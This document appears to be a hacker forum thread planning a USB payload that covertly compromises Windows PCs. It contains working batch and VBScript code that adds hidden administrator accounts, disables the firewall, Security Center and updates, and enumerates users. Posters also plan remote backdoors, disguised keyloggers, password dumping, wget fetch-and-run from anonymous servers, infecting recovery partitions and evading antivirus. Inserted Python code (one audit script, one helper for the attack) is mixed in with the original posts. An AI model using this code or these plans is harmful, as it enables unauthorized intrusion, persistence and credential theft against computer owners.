New payload idea


DingleBerries

So I've been contemplating making a new payload for a while... These are some of the things that I want to implement:

1. No .VBS or .NET

2. Mostly command line, and the .BATs will all be .EXEs, just because I like those better

3. Dump SAM or create a new admin, via command line, preferably both

4. Install a remote shell; this part is already taken care of

5. Dump a list of all users on the computer

And that's about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible, so there isn't any slurping of docs and whatnot, maybe pics ;). The dumping part will be done via command line, i.e. run rs.exe, because the shell copies itself once it's run. Other than that I have a good keylogger; it runs low on memory and can be customized... Right now I am still looking for ideas, so if you have any let me know.

This is the code that will be used for the Admin account.

Invisible User:Tiny

@echo off
REM Create the account and put it in the local Administrators group
REM ("administrators" is the English group name; it differs on localized Windows)
net user Tiny password /add && net localgroup administrators Tiny /add
REM Write a .reg file that hides the account from the Welcome screen and
REM the User Accounts applet (a dword of 0 under SpecialAccounts\UserList)
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "Tiny"=dword:00000000>> c:\hide.reg
REM /S imports silently (no confirmation dialog); the file is removed afterwards
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
REM Hide the profile folder. It is only created at the account's first logon,
REM so this line does nothing if the batch runs before then.
attrib +r +a +s +h %SystemDrive%\docume~1\Tiny
Exit

Also, I am thinking of just dumping the .reg of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ because it contains all the users; that way we can limit 3rd-party software. Like so:

REGEDIT /E EDIT_PATH_OF_DRIVE\FILE.REG "HKEY_LOCAL\----"

Disable Windows Firewall:

@echo off
REM Stop Security Center (service name wscsvc) and the Windows Firewall/ICS service (SharedAccess)
net stop "Security Center"
net stop SharedAccess
REM Start=4 is SERVICE_DISABLED, so they stay off across reboots.
REM wuauserv is Automatic Updates; /f overwrites without prompting.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f

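The two batch files above touch exactly the keys a `REGEDIT /E` export captures, so the same export is what a responder would check afterwards. The following Python is an added example for this thread, not code from any of the posts: it parses the Regedit 5.00 text format (quoted strings, dword values, hex byte runs with regedit's backslash line continuations), reports accounts hidden through SpecialAccounts\UserList (value 0), and reports SharedAccess, wscsvc and wuauserv when their Start value is 4. The export text embedded in it is constructed for the example, and treating HelpAssistant as a known-good baseline entry is an assumption made here, not something the thread states.

```python
"""Offline audit of a `REGEDIT /E` export (Regedit 5.00 text format) for the
changes made above: hidden accounts in the Winlogon SpecialAccounts UserList
and disabled firewall / Security Center / Automatic Updates services.
Added example, not code from the thread; the export text is constructed."""
import re
from typing import Dict, List

# Constructed sample. Real exports are UTF-16LE with a BOM; read them with
# open(path, encoding="utf-16").read() to get text this parser accepts.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Tiny"=dword:00000000
"HelpAssistant"=dword:00000000
"Support"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"DisplayName"="Windows Firewall/Internet Connection Sharing (ICS)"
"Description"=hex(2):53,00,\
  65,00,00,00
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004
"""

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
SERVICES_PREFIX = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services" + "\\"
SERVICE_DISABLED = 4                                        # Start=4 is SERVICE_DISABLED
WATCHED_SERVICES = ("SharedAccess", "wscsvc", "wuauserv")   # firewall/ICS, Security Center, Automatic Updates

_KEY_RE = re.compile(r"^\[(-?)(.+)\]$")                          # [key] or [-key] (key deletion)
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')     # "name"=... or @=... (default value)

def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")

def _decode_value(raw: str) -> object:
    """Decode the right-hand side of a value line into a Python object."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return _unescape(raw[1:-1])                       # REG_SZ
    if raw.startswith("dword:"):
        return int(raw[6:], 16)                           # REG_DWORD
    if raw.startswith("hex"):                             # hex:, hex(2):, hex(7): ... -> raw bytes
        data = raw.split(":", 1)[1]
        return bytes(int(b, 16) for b in data.split(",") if b)
    return None if raw == "-" else raw                    # "-" marks a deleted value

def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Parse export text into {key_path: {value_name: value}}; "" is the default value.
    Handles the backslash line continuations regedit emits for long hex data."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        key = _KEY_RE.match(line)
        if key:
            current = key.group(2)
            keys.setdefault(current, {})
            continue
        val = _VALUE_RE.match(line)
        if val is None or current is None:
            continue
        raw = val.group(2).strip()
        while raw.endswith("\\") and i < len(lines):     # data continues on the next line
            raw = raw[:-1] + lines[i].strip()
            i += 1
        keys[current][_unescape(val.group(1) or "")] = _decode_value(raw)
    return keys

def hidden_accounts(reg: Dict[str, Dict[str, object]], baseline=frozenset()) -> List[str]:
    """Names with UserList value 0 (hidden from the Welcome screen), minus a baseline."""
    values = reg.get(USERLIST_KEY, {})
    return sorted(n for n, v in values.items() if v == 0 and n not in baseline)

def disabled_services(reg: Dict[str, Dict[str, object]]) -> List[str]:
    """Watched services whose Start value is SERVICE_DISABLED."""
    return [s for s in WATCHED_SERVICES
            if reg.get(SERVICES_PREFIX + s, {}).get("Start") == SERVICE_DISABLED]

def audit_export(text: str, userlist_baseline=frozenset()) -> Dict[str, List[str]]:
    reg = parse_reg(text)
    return {"hidden_accounts": hidden_accounts(reg, userlist_baseline),
            "disabled_services": disabled_services(reg)}

if __name__ == "__main__":
    # Assumption for the example: HelpAssistant is the analyst's known-good baseline entry.
    for finding, names in audit_export(SAMPLE_REG, {"HelpAssistant"}).items():
        print(finding, names)
```

Run against a real export with `audit_export(open("winlogon.reg", encoding="utf-16").read(), baseline)`; the baseline set should come from a clean machine of the same build, since the default contents of UserList vary between Windows versions.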

I've been thinking of trying to write it in Python... and also maybe reworking the tools of the payload to be just scripts; then the entire thing can be made an exe.


For point 5 you can execute this code; it's in VBScript. Of course, it can be modified to show only the users and not the groups...

UsersGroups.vbs

'UsersGroups.vbs
'This script enumerates users, grouped by each local group on a computer.
'It creates a new file called users.txt in the directory it is executed from.
'The code has been rebuilt from a similar app, but it works fine.
'DMilton for free community
'Thread post at http://hak5.org/forums/index.php?showtopic=10746

'Explicit variable declaration
Option Explicit 
 Dim obj_UserName 
 Dim obj_GroupName 
 Dim obj_PC 
 Dim obj_Group 
 Dim obj_Members
 Dim obj_Shell 
 Dim str_PC 
 Dim str_Name
 Dim objFSO
 Dim objTextFile
 Dim ExitFile
 Const ForReading = 1, ForWriting = 2, ForAppending = 8
'Arguments
 ExitFile = "users.txt"
'Output file creation (an existing users.txt is overwritten)
 Set objFSO = CreateObject("Scripting.FileSystemObject")
 Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True)
'Local computer: "." is the WinNT provider's name for the local machine
 str_PC = "." 
 Set obj_Shell = CreateObject("WScript.Shell") 
 str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
'Creates an object obj_PC bound to the local computer 
 Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer") 
 objTextFile.WriteLine("Computer name is: " & str_Name) 
'Filter the container so the loop only sees groups
 obj_PC.Filter = Array("Group") 
'Go through the groups and write the txt 
 For Each obj_GroupName In obj_PC 
     'Bind to the current group
      Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group") 
      'Write the group header
      objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name) 
      'Members returns a fresh collection on every call, so keep one reference
      'and set the filter on it; otherwise the filter is lost before the loop
       Set obj_Members = obj_Group.Members
       obj_Members.Filter = Array("User") 
      'Print each user (nested groups are skipped by the filter)
       For Each obj_UserName In obj_Members
            objTextFile.WriteLine("                  " & obj_UserName.Name)
       Next
Next 
'Flush and close the output file
 objTextFile.Close
'Clean up the variables
 Set objTextFile = Nothing
 Set objFSO = Nothing
 Set obj_UserName = Nothing 
 Set obj_GroupName = Nothing 
 Set obj_Members = Nothing
 Set obj_Group = Nothing
 Set obj_PC = Nothing 
 Set obj_Shell = Nothing

Moreover, I think that with the groups info in the final users.txt, adding a key in the registry for creating an admin account is simple, or not?

:: Create the account, add it to the (English-named) Administrators group, then set its password
net user "USBAdmin" /add
net localgroup administrators "USBAdmin" /add
net user "USBAdmin" password

The problem with adding privileges is that this automation would work in English versions but not in other languages such as Spanish, where the Administrators group is named Administradores, but with the groups listed by the vbs you can easily extract the correct word, "Admin"-istrators or "Admin"-istradores, to add the correct privileges.

Finally, it would be necessary to add "USBAdmin" to the Special Accounts User List by adding a DWORD 0 for the created "USBAdmin", executed from a batch (or whatever else). In this case, from the command line it would be...

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0 /f

:P


Part of my idea of writing the payload in Python would be cross-platform compatibility... What I've been thinking of doing too is writing a bunch of scripts in Python that would be included on a minimal distribution of Linux to do administrative tasks on a Windows machine. All this could be included on a boot CD or boot USB drive, so the payload could be run on a machine on reboot. It would be far more complicated than the current switchblade... and would probably have a name like machete... So in the end the payload could be run from Windows on insertion, or if you booted from the stick it would load Linux text-only and grab all the same info from Windows...

So if anyone likes this idea let me know... Also, is there anyone who knows enough Python to assist?


I'm cleaning the code you posted, making it efficient for any installation language, adding some other things, and it will be posted as soon as I have it working right.

That's awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. whether to include the keylogger. There would not be a need for the logs to be sent off because you could transfer them via the remote shell. Another thing I was considering is the "guest trick", where when logged on via Guest a batch script containing instructions to create an admin account is placed in the admin's startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).


I've been tweaking some of the AutoIt code for the remote switchblade. Using psexec.exe I was successfully running it on a remote computer; you still need domain admin rights, and there's the issue of what user account the programs are run under... so I'm looking at other methods of information retrieval. But the payload executes fine and logs to the remote computer fine.

The payload I was running just outputs the results to stdout.

So basically, there's an exe, payload.exe,

then there's a bat file I created to run the payload with psexec.exe \\remotecomputer -u admin -p password payload.exe

Then open a command prompt and type payload.bat > output.log

This can and will all be scripted correctly later, but for testing purposes it works fine.

But it would be easy enough to tailor this to set up a reverse backdoor, etc...

My only complaint is that we are still tied down to these NirSoft programs, which are not open source.

In the long run I'd like to get some of this password-dumping code released as open source and rewritten in different languages. Also, the limitation of the NirSoft programs is that they only dump information for the currently logged-on user.


The back door is open source. It's from White Scorpion and will, hopefully, be custom once the final version of this is out.. I really just want something that's quick and painless. All the VNC stuff is a waste of time and is easily detected by smart admins. Once the computer is owned with the back door then we can start doing other things: transferring logs, installing other backdoors, etc.

So far these are the only programs that will be needed:

White Scorpion's Tiny back door - that is, unless I find a better one

Custom keylogger - C++, runs low on memory; I would like to either hide it from the process manager or masquerade it as "svchost" or the like.

Wget - so that other files can be snatched from a host and executed; no need to revisit the computer.

There are a few more things that I am looking at. I am coming close to the last weeks of class, so studying and whatnot are my priorities atm. However, these are things I am considering:

creddump

Root Kits hidden in the microprocessor?

PWDumpX v1.4

Sysinternals Shit:

Ctrl2Cap v2.0 - Interested in this for maybe a new keylogger

PhysMem - dumps RAM to hex

RegHide - maybe useful in hiding the new admin account

Of course all of these can be hosted on some remote server (be sure that you do it anonymously so as not to get caught) and just use wget. You would have to wait until late at night so as not to tip the owner off to any of your activities.

P.S. Sorry I dumped all this here; I am just making sure I do not lose or forget anything.


Some quick thoughts (I'm short on time, so we can delve into specifics via PM if you want):

* We can stop Security Center, but instead of modifying the registry, why not use the netsh commands to disable the firewall? Fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener?

* We can use the net user command to add the user to the system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

* We can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host-based IDS type progs.

* Cain and Abel is pretty good at decrypting the LSA secrets.


I like all of those; the only problem I see is Cain & Abel getting caught by the virus scan. I really like punching a hole in the FW; I really didn't want to disable it completely.

Also, I am going to use your idea of the .dat file in the root directory, but instead I want to contaminate the recovery partition; that way even if they do reinstall, the payload will remain there... I'm still working on this part. But what it will probably look for is a file specific to the recovery partition.


While you decide what the payload should do, I've been playing with some of your first ideas.

Executing it will extract the Administrators group name reliably for any installation language, or even if the user is experienced and has changed it, into a variable that can be used by the called batch. The idea of calling a batch program is to continue in the batch way you mentioned, but because I don't know how to extract the real Administrators group name from the command line, I did it in VBScript, ready to use.

By the way, here is the code for the VbScript:

'ListAdminGroup.vbs
'Resolves the local Administrators group by its well-known SID, exports the
'name in %AdminGroup% and launches start.bat with that environment.
Option Explicit
Dim objWshNetwork, objShell, objEnv, objFSO, obj_Group
Dim str_PC, str_GroupSID, str_GroupName, strPath

Set objWshNetwork = CreateObject("WScript.Network") 
Set objShell = CreateObject("Wscript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
'PROCESS variables are inherited by the batch started below and vanish when this script exits
Set objEnv = objShell.Environment("PROCESS")
str_PC = objWshNetwork.ComputerName 
' SID of the Administrators group (identical on every Windows installation, whatever the language)
str_GroupSID = "S-1-5-32-544"
str_GroupName = GetGroupName(str_PC, str_GroupSID) 
If str_GroupName = "" Then
    WScript.Echo "Could not resolve the Administrators group name"
    WScript.Quit 1
End If
'Binding to the group confirms the resolved name before start.bat relies on it
Set obj_Group = GetObject("WinNT://" & str_PC & "/" _ 
& str_GroupName & ",group")
objEnv("AdminGroup") = str_GroupName
'start.bat is taken from this script's own folder, whatever the current directory is
strPath = objFSO.BuildPath(objFSO.GetParentFolderName(WScript.ScriptFullName), "start.bat")
objShell.Run Chr(34) & strPath & Chr(34), 1, False

Function GetGroupName(sComputer, sGroupSID) 
Dim oGroupAccounts, oGroupAccount 
GetGroupName = ""
'Set for WinXP: local groups report the computer name as their domain
Set oGroupAccounts = GetObject( _ 
"winmgmts://" & sComputer & "/root/cimv2") _ 
.ExecQuery("Select Name from Win32_Group" _ 
& " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'") 
'For Win2k we use the 'BUILTIN' domain
If oGroupAccounts.Count = 0 Then 
    Set oGroupAccounts = GetObject( _ 
    "winmgmts://" & sComputer & "/root/cimv2") _ 
    .ExecQuery("Select Name from Win32_Group" _ 
    & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'") 
End If 
For Each oGroupAccount In oGroupAccounts 
    GetGroupName = oGroupAccount.Name 
Next 
End Function

I think it will work in Windows XP and Windows 2000, but if you can play with it on other versions, that would be great.

Once the script has finished, it launches the start.bat batch. It will create an administrator account whose name is defined in the %NewAdmin% variable, with a password given by the %password% variable, and add it to the Administrators group using the %AdminGroup% variable given by the vbs. It creates the correct folder, hides it, and adds the new account name to the Special Accounts so it is invisible to the user.

Here is the start.bat code. By the way, it must be in the same dir as the VbScript.

::start.bat
@echo off
set NewAdmin=USBAdmin
set password=YouWasHacked!
set Folder=%SystemDrive%\Documents and Settings\%NewAdmin%
:: Create the account first; adding it to a group before it exists fails
net user %NewAdmin% %password% /add
:: %AdminGroup% is set by ListAdminGroup.vbs, so this works in any installation language
net localgroup "%AdminGroup%" %NewAdmin% /add
:: A dword of 0 removes the account from the Welcome screen and the User Accounts applet
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0 /f
:: Pre-create the profile folder so it can be hidden before the first logon.
:: Caveat: if this folder already exists at first logon, Windows may create the
:: real profile as %NewAdmin%.%COMPUTERNAME% instead of using this one.
mkdir "%Folder%"
attrib +a +s +h "%Folder%"

It will also address Tcstool's point about fewer fingerprints:

* We can use the net user command to add the user to the system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

About Tcstool's question:

* We can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host-based IDS type progs.

The code for Users.vbs can be:

'Users.vbs
'Writes every local user name once to a text file (users.txt, or the path
'given as first argument), walking the local groups as UsersGroups.vbs does.
Option Explicit 

Dim obj_UserName 
Dim obj_GroupName 
Dim obj_PC 
Dim obj_Group 
Dim obj_Members
Dim str_Computer 
Dim objFSO
Dim objTextFile
Dim str_File
Dim dic_Seen
Const ForReading = 1, ForWriting = 2, ForAppending = 8

'Optional first argument: output file name
If WScript.Arguments.Count > 0 Then
    str_File = WScript.Arguments.Item(0)
Else
    str_File = "users.txt"
End If
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True)
'A user belonging to several groups would otherwise be written once per group
Set dic_Seen = CreateObject("Scripting.Dictionary")
dic_Seen.CompareMode = 1    'TextCompare: user names are case-insensitive
str_Computer = "." 
Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer") 
obj_PC.Filter = Array("Group") 
For Each obj_GroupName In obj_PC
    Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group") 
    'Keep one Members collection so the filter applies to the loop below
    Set obj_Members = obj_Group.Members
    obj_Members.Filter = Array("User") 
    For Each obj_UserName In obj_Members
        If Not dic_Seen.Exists(obj_UserName.Name) Then
            dic_Seen.Add obj_UserName.Name, True
            objTextFile.WriteLine(obj_UserName.Name)   
        End If
    Next 
Next
objTextFile.Close

It will extract all user names into a new users.txt file for further use.

And that's all for the moment! :lol:

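The WMI query in ListAdminGroup.vbs above works on Spanish or German installs because it looks up the group by the well-known SID S-1-5-32-544 rather than by name. As an added example for this thread, not code from any of the posts, the Python below does the same resolution directly against advapi32!LookupAccountSidW and shows the binary SID layout that API expects. sid_to_bytes and bytes_to_sid are pure encoding and run anywhere; lookup_account_by_sid only works on Windows and returns None elsewhere. The `net localgroup` string it builds is illustrative, assuming the `net` syntax already used in the thread.

```python
"""Resolve the local Administrators group by its well-known SID S-1-5-32-544
instead of a hard-coded, localized name. Added example for this thread, not
code from the original posts. sid_to_bytes/bytes_to_sid implement the binary
SID layout and run anywhere; lookup_account_by_sid calls
advapi32!LookupAccountSidW and therefore only works on Windows."""
import ctypes
import struct
import sys
from typing import Optional, Tuple

ADMINISTRATORS_SID = "S-1-5-32-544"   # BUILTIN\Administrators on every Windows, any language

def sid_to_bytes(sid: str) -> bytes:
    """Encode "S-R-A-s1-s2-..." into the SID structure Windows APIs take:
    revision (1 byte), sub-authority count (1 byte), 48-bit big-endian
    identifier authority, then each sub-authority as 32-bit little-endian."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0].upper() != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("SID has more than 15 sub-authorities")
    return (struct.pack("BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(data: bytes) -> str:
    """Inverse of sid_to_bytes, for checking a SID handed back by an API."""
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))

def lookup_account_by_sid(sid: str) -> Optional[Tuple[str, str]]:
    """Return (name, domain) for a SID on the local machine, or None when not on
    Windows. LookupAccountSidW answers in the installed language, so S-1-5-32-544
    resolves to Administrators, Administradores, Administratoren, ... as appropriate."""
    if sys.platform != "win32":
        return None
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    raw = sid_to_bytes(sid)
    psid = ctypes.create_string_buffer(raw, len(raw))
    name_len = ctypes.c_uint32(0)
    domain_len = ctypes.c_uint32(0)
    sid_use = ctypes.c_uint32(0)
    # First call with empty buffers only reports the sizes needed (it fails with
    # ERROR_INSUFFICIENT_BUFFER, which is expected here).
    advapi32.LookupAccountSidW(None, psid, None, ctypes.byref(name_len),
                               None, ctypes.byref(domain_len), ctypes.byref(sid_use))
    name = ctypes.create_unicode_buffer(name_len.value)
    domain = ctypes.create_unicode_buffer(domain_len.value)
    ok = advapi32.LookupAccountSidW(None, psid, name, ctypes.byref(name_len),
                                    domain, ctypes.byref(domain_len), ctypes.byref(sid_use))
    if not ok:
        raise ctypes.WinError(ctypes.get_last_error())
    return name.value, domain.value

def add_to_administrators_command(user: str) -> Optional[str]:
    """Locale-independent replacement for `net localgroup administrators <user> /add`:
    resolve the real group name first, then build the command. None off Windows."""
    resolved = lookup_account_by_sid(ADMINISTRATORS_SID)
    if resolved is None:
        return None
    group_name, _domain = resolved
    return 'net localgroup "%s" "%s" /add' % (group_name, user)

if __name__ == "__main__":
    print(sid_to_bytes(ADMINISTRATORS_SID).hex())
    print(add_to_administrators_command("USBAdmin"))
```

The same SID trick covers the other built-in groups (S-1-5-32-555 Remote Desktop Users, for instance, if the RDP idea earlier in the thread is pursued), and it is also how a reviewer can tell a renamed Administrators group from a decoy group that merely carries the name.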

I have already compiled all the bats into an exe. I haven't slept since 6:30 this morning, class and whatnot, so I didn't have the mind power to do any more.. Check out the small one I have HERE. The next release will actually have substance to it.


I'm not saying we upload Cain & Abel to the local machine. You asked if it could be decrypted easily, and I was saying we could use it to work on our data back at our evil hacker lair after we've run the payload ;)

It will be hard to contaminate the recovery partitions because all the different PC vendors handle that partition differently. Maybe we should target Dells??? :-)
